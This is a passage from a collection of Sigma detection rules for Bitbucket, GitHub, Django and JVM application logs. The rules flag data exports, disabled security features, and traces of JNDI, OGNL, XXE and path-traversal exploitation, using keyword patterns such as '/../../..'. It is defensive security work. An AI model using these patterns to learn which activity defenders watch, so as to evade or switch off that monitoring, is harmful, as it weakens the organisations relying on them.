    "content": "title: Bitbucket User Details Export Attempt Detected\nid: 5259cbf2-0a75-48bf-b57a-c54d6fabaef3\nstatus: test\ndescription: Detects user data export activity.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.collection\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.t1213\n    - attack.t1082\n    - attack.t1591.004\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Users and groups'\n        auditType.action:\n            - 'User permissions export failed'\n            - 'User permissions export started'\n            - 'User permissions exported'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml",
    "content": "title: Bitbucket User Login Failure\nid: 70ed1d26-0050-4b38-a599-92c53d57d45a\nstatus: test\ndescription: |\n    Detects user authentication failure events.\n    Please note that this rule can be noisy and it is recommended to use with correlation based on \"author.name\" field.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Authentication'\n        auditType.action: 'User login failed'\n    condition: selection\nfalsepositives:\n    - Legitimate user wrong password attempts.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml",
    "content": "title: Bitbucket User Login Failure Via SSH\nid: d3f90469-fb05-42ce-b67d-0fded91bbef3\nstatus: test\ndescription: |\n    Detects SSH user login access failures.\n    Please note that this rule can be noisy and is recommended to use with correlation based on \"author.name\" field.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html\n    - https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.t1021.004\n    - attack.t1110\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Authentication'\n        auditType.action: 'User login failed(SSH)'\n    condition: selection\nfalsepositives:\n    - Legitimate user wrong password attempts.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml",
    "content": "title: Bitbucket User Permissions Export Attempt\nid: 87cc6698-3e07-4ba2-9b43-a85a73e151e2\nstatus: test\ndescription: Detects user permission data export attempt.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.reconnaissance\n    - attack.collection\n    - attack.discovery\n    - attack.t1213\n    - attack.t1082\n    - attack.t1591.004\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Users and groups'\n        auditType.action:\n            - 'User details export failed'\n            - 'User details export started'\n            - 'User details exported'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/django/appframework_django_exceptions.yml",
    "content": "title: Django Framework Exceptions\nid: fd435618-981e-4a7c-81f8-f78ce480d616\nstatus: stable\ndescription: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts\nreferences:\n    - https://docs.djangoproject.com/en/1.11/ref/exceptions/\n    - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security\nauthor: Thomas Patzke\ndate: 2017-08-05\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: django\ndetection:\n    keywords:\n        - SuspiciousOperation\n        # Subclasses of SuspiciousOperation\n        - DisallowedHost\n        - DisallowedModelAdminLookup\n        - DisallowedModelAdminToField\n        - DisallowedRedirect\n        - InvalidSessionKey\n        - RequestDataTooBig\n        - SuspiciousFileOperation\n        - SuspiciousMultipartForm\n        - SuspiciousSession\n        - TooManyFieldsSent\n        # Further security-related exceptions\n        - PermissionDenied\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_delete_action_invoked.yml",
    "content": "title: Github Delete Action Invoked\nid: 16a71777-0b2e-4db7-9888-9d59cb75200b\nstatus: test\ndescription: Detects delete action in the Github audit logs for codespaces, environment, project and repo.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-19\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\ntags:\n    - attack.impact\n    - attack.collection\n    - attack.t1213.003\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'codespaces.delete'\n            - 'environment.delete'\n            - 'project.delete'\n            - 'repo.destroy'\n    condition: selection\nfalsepositives:\n    - Validate the deletion activity is permitted. The \"actor\" field need to be validated.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_disable_high_risk_configuration.yml",
    "content": "title: Github High Risk Configuration Disabled\nid: 8622c92d-c00e-463c-b09d-fd06166f6794\nstatus: test\ndescription: Detects when a user disables a critical security feature for an organization.\nreferences:\n    - https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions\n    - https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-29\nmodified: 2024-07-22\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1556\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'business_advanced_security.disabled_for_new_repos'\n            - 'business_advanced_security.disabled_for_new_user_namespace_repos'\n            - 'business_advanced_security.disabled'\n            - 'business_advanced_security.user_namespace_repos_disabled'\n            - 'org.advanced_security_disabled_for_new_repos'\n            - 'org.advanced_security_disabled_on_all_repos'\n            - 'org.advanced_security_policy_selected_member_disabled'\n            - 'org.disable_oauth_app_restrictions'\n            - 'org.disable_two_factor_requirement'\n            - 'repo.advanced_security_disabled'\n    condition: selection\nfalsepositives:\n    - Approved administrator/owner activities.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_disabled_outdated_dependency_or_vulnerability.yml",
    "content": "title: Outdated Dependency Or Vulnerability Alert Disabled\nid: 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d\nstatus: test\ndescription: |\n    Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.\n    This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-27\nreferences:\n    - https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization\ntags:\n    - attack.initial-access\n    - attack.t1195.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'dependabot_alerts_new_repos.disable'\n            - 'dependabot_alerts.disable'\n            - 'dependabot_security_updates_new_repos.disable'\n            - 'dependabot_security_updates.disable'\n            - 'repository_vulnerability_alerts.disable'\n    condition: selection\nfalsepositives:\n    - Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_fork_private_repos_enabled_or_cleared.yml",
    "content": "title: Github Fork Private Repositories Setting Enabled/Cleared\nid: 69b3bd1e-b38a-462f-9a23-fbdbf63d2294\nstatus: test\ndescription: |\n    Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking\nauthor: Romain Gaillard (@romain-gaillard)\ndate: 2024-07-29\ntags:\n    - attack.persistence\n    - attack.exfiltration\n    - attack.t1020\n    - attack.t1537\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'private_repository_forking.clear' # An enterprise owner cleared the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise.\n            - 'private_repository_forking.enable' # An enterprise owner enabled the policy setting for allowing forks of private and internal repositories, for a repository, organization or enterprise. Private and internal repositories are always allowed to be forked.\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_new_org_member.yml",
    "content": "title: New Github Organization Member Added\nid: 3908d64a-3c06-4091-b503-b3a94424533b\nstatus: test\ndescription: Detects when a new member is added or invited to a github organization.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-29\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions\ntags:\n    - attack.persistence\n    - attack.t1136.003\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'org.add_member'\n            - 'org.invite_member'\n    condition: selection\nfalsepositives:\n    - Organization approved new members\nlevel: informational\n"
  },
  {
    "path": "rules/application/github/audit/github_new_secret_created.yml",
    "content": "title: Github New Secret Created\nid: f9405037-bc97-4eb7-baba-167dad399b83\nstatus: test\ndescription: Detects when a user creates action secret for the organization, environment, codespaces or repository.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-20\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'codespaces.create_an_org_secret'\n            - 'environment.create_actions_secret'\n            - 'org.create_actions_secret'\n            - 'repo.create_actions_secret'\n    condition: selection\nfalsepositives:\n    - This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the \"actor\".\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_outside_collaborator_detected.yml",
    "content": "title: Github Outside Collaborator Detected\nid: eaa9ac35-1730-441f-9587-25767bde99d7\nstatus: test\ndescription: |\n    Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-20\nreferences:\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.collection\n    - attack.t1098.001\n    - attack.t1098.003\n    - attack.t1213.003\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'org.remove_outside_collaborator'\n            - 'project.update_user_permission'\n    condition: selection\nfalsepositives:\n    - Validate the actor if permitted to access the repo.\n    - Validate the Multifactor Authentication changes.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_pages_site_changed_to_public.yml",
    "content": "title: GitHub Repository Pages Site Changed to Public\nid: 0c46d4f4-a2bf-4104-9597-8d653fc2bb55\nstatus: experimental\ndescription: |\n    Detects when a GitHub Pages site of a repository is made public. This usually is part of a publishing process but could indicate or lead to potential unauthorized exposure of sensitive information or code.\nreferences:\n    - https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site\n    - https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms\n    - https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events\nauthor: Ivan Saakov\ndate: 2025-10-18\ntags:\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1567.001\nlogsource:\n    product: github\n    service: audit\ndetection:\n    selection:\n        action: 'repo.pages_public'\n    condition: selection\nfalsepositives:\n    - Legitimate publishing of repository pages by authorized users\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_push_protection_bypass_detected.yml",
    "content": "title: Github Push Protection Bypass Detected\nid: 02cf536a-cf21-4876-8842-4159c8aee3cc\nstatus: test\ndescription: Detects when a user bypasses the push protection on a secret detected by secret scanning.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations\n    - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action|contains: 'secret_scanning_push_protection.bypass'\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_push_protection_disabled.yml",
    "content": "title: Github Push Protection Disabled\nid: ccd55945-badd-4bae-936b-823a735d37dd\nstatus: test\ndescription: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations\n    - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'business_secret_scanning_custom_pattern_push_protection.disabled'\n            - 'business_secret_scanning_push_protection.disable'\n            - 'business_secret_scanning_push_protection.disabled_for_new_repos'\n            - 'org.secret_scanning_custom_pattern_push_protection_disabled'\n            - 'org.secret_scanning_push_protection_disable'\n            - 'org.secret_scanning_push_protection_new_repos_disable'\n            - 'repository_secret_scanning_custom_pattern_push_protection.disabled'\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_repo_or_org_transferred.yml",
    "content": "title: Github Repository/Organization Transferred\nid: 04ad83ef-1a37-4c10-b57a-81092164bf33\nstatus: test\ndescription: Detects when a repository or an organization is being transferred to another location.\nreferences:\n    - https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository\n    - https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership\n    - https://docs.github.com/en/migrations\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration\nauthor: Romain Gaillard (@romain-gaillard)\ndate: 2024-07-29\ntags:\n    - attack.persistence\n    - attack.exfiltration\n    - attack.t1020\n    - attack.t1537\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'migration.create' # A migration file was created for transferring data from a source location (such as a GitHub.com organization or a GitHub Enterprise Server instance) to a target GitHub Enterprise Server instance.\n            - 'org.transfer_outgoing' # An organization was transferred between enterprise accounts.\n            - 'org.transfer' # An organization was transferred between enterprise accounts.\n            - 'repo.transfer_outgoing' # A repository was transferred to another repository network.\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: medium\n"
  },
  {
    "path": "rules/application/github/audit/github_repository_archive_status_changed.yml",
    "content": "title: GitHub Repository Archive Status Changed\nid: dca8991c-cb16-4128-abf8-6b11e5cd156f\nstatus: experimental\ndescription: |\n    Detects when a GitHub repository is archived or unarchived, which may indicate unauthorized changes to repository status.\nreferences:\n    - https://docs.github.com/en/repositories/archiving-a-github-repository/archiving-repositories\n    - https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms\n    - https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events\nauthor: Ivan Saakov\ndate: 2025-10-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.impact\nlogsource:\n    product: github\n    service: audit\ndetection:\n    selection:\n        action:\n            - 'repo.archived'\n            - 'repo.unarchived'\n    condition: selection\nfalsepositives:\n    - Archiving or unarchiving a repository is often legitimate. Investigate this action to determine if it was authorized.\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_secret_scanning_feature_disabled.yml",
    "content": "title: Github Secret Scanning Feature Disabled\nid: 3883d9a0-fd0f-440f-afbb-445a2a799bb8\nstatus: test\ndescription: Detects if the secret scanning feature is disabled for an enterprise or repository.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-03-07\nmodified: 2024-07-19\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'business_secret_scanning.disable'\n            - 'business_secret_scanning.disabled_for_new_repos'\n            - 'repository_secret_scanning.disable'\n            - 'secret_scanning_new_repos.disable'\n            - 'secret_scanning.disable'\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: high\n"
  },
  {
    "path": "rules/application/github/audit/github_self_hosted_runner_changes_detected.yml",
    "content": "title: Github Self Hosted Runner Changes Detected\nid: f8ed0e8f-7438-4b79-85eb-f358ef2fbebd\nstatus: test\ndescription: |\n    A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.\n    This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected,\n    it should be validated from GitHub UI because the log entry may not provide full context.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-01-27\nreferences:\n    - https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners\n    - https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation\ntags:\n    - attack.impact\n    - attack.discovery\n    - attack.collection\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1526\n    - attack.t1213.003\n    - attack.t1078.004\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'org.remove_self_hosted_runner'\n            - 'org.runner_group_created'\n            - 'org.runner_group_removed'\n            - 'org.runner_group_runner_removed'\n            - 'org.runner_group_runners_added'\n            - 'org.runner_group_runners_updated'\n            - 'org.runner_group_updated'\n            - 'repo.register_self_hosted_runner'\n            - 'repo.remove_self_hosted_runner'\n    condition: selection\nfalsepositives:\n    - Allowed self-hosted runners changes in the environment.\n    - A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days.\n    - An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day.\nlevel: low\n"
  },
  {
    "path": "rules/application/github/audit/github_ssh_certificate_config_changed.yml",
    "content": "title: Github SSH Certificate Configuration Changed\nid: 2f575940-d85e-4ddc-af13-17dad6f1a0ef\nstatus: test\ndescription: Detects when changes are made to the SSH certificate configuration of the organization.\nreferences:\n    - https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities\n    - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority\nauthor: Romain Gaillard (@romain-gaillard)\ndate: 2024-07-29\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: github\n    service: audit\n    definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming'\ndetection:\n    selection:\n        action:\n            - 'ssh_certificate_authority.create' # An SSH certificate authority for an organization or enterprise was created.\n            - 'ssh_certificate_requirement.disable' # The requirement for members to use SSH certificates to access an organization resources was disabled.\n    condition: selection\nfalsepositives:\n    - Allowed administrative activities.\nlevel: medium\n"
  },
  {
    "path": "rules/application/jvm/java_jndi_injection_exploitation_attempt.yml",
    "content": "title: Potential JNDI Injection Exploitation In JVM Based Application\nid: bb0e9cec-d4da-46f5-997f-22efc59f3dca\nstatus: test\ndescription: Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\n    - https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'com.sun.jndi.ldap.'\n        - 'org.apache.logging.log4j.core.net.JndiManager'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_local_file_read.yml",
    "content": "title: Potential Local File Read Vulnerability In JVM Based Application\nid: e032f5bc-4563-4096-ae3b-064bab588685\nstatus: test\ndescription: |\n    Detects potential local file read vulnerability in JVM based apps.\n    If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords_local_file_read:\n        '|all':\n            - 'FileNotFoundException'\n            - '/../../..'\n    condition: keywords_local_file_read\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_ognl_injection_exploitation_attempt.yml",
    "content": "title: Potential OGNL Injection Exploitation In JVM Based Application\nid: 4d0af518-828e-4a04-a751-a7d03f3046ad\nstatus: test\ndescription: |\n    Detects potential OGNL Injection exploitation, which may lead to RCE.\n    OGNL is an expression language that is supported in many JVM based systems.\n    OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2017-5638\n    - cve.2022-26134\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'org.apache.commons.ognl.OgnlException'\n        - 'ExpressionSyntaxException'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_rce_exploitation_attempt.yml",
    "content": "title: Process Execution Error In JVM Based Application\nid: d65f37da-a26a-48f8-8159-3dde96680ad2\nstatus: test\ndescription: Detects process execution related exceptions in JVM based apps, often relates to RCE\nreferences:\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'Cannot run program'\n        - 'java.lang.ProcessImpl'\n        - 'java.lang.ProcessBuilder'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/jvm/java_xxe_exploitation_attempt.yml",
    "content": "title: Potential XXE Exploitation Attempt In JVM Based Application\nid: c4e06896-e27c-4583-95ac-91ce2279345d\nstatus: test\ndescription: Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.\nreferences:\n    - https://rules.sonarsource.com/java/RSPEC-2755\n    - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: jvm\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'SAXParseException'\n        - 'DOMException'\n    condition: keywords\nfalsepositives:\n    - If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE.\nlevel: high\n"
  },
  {
    "path": "rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml",
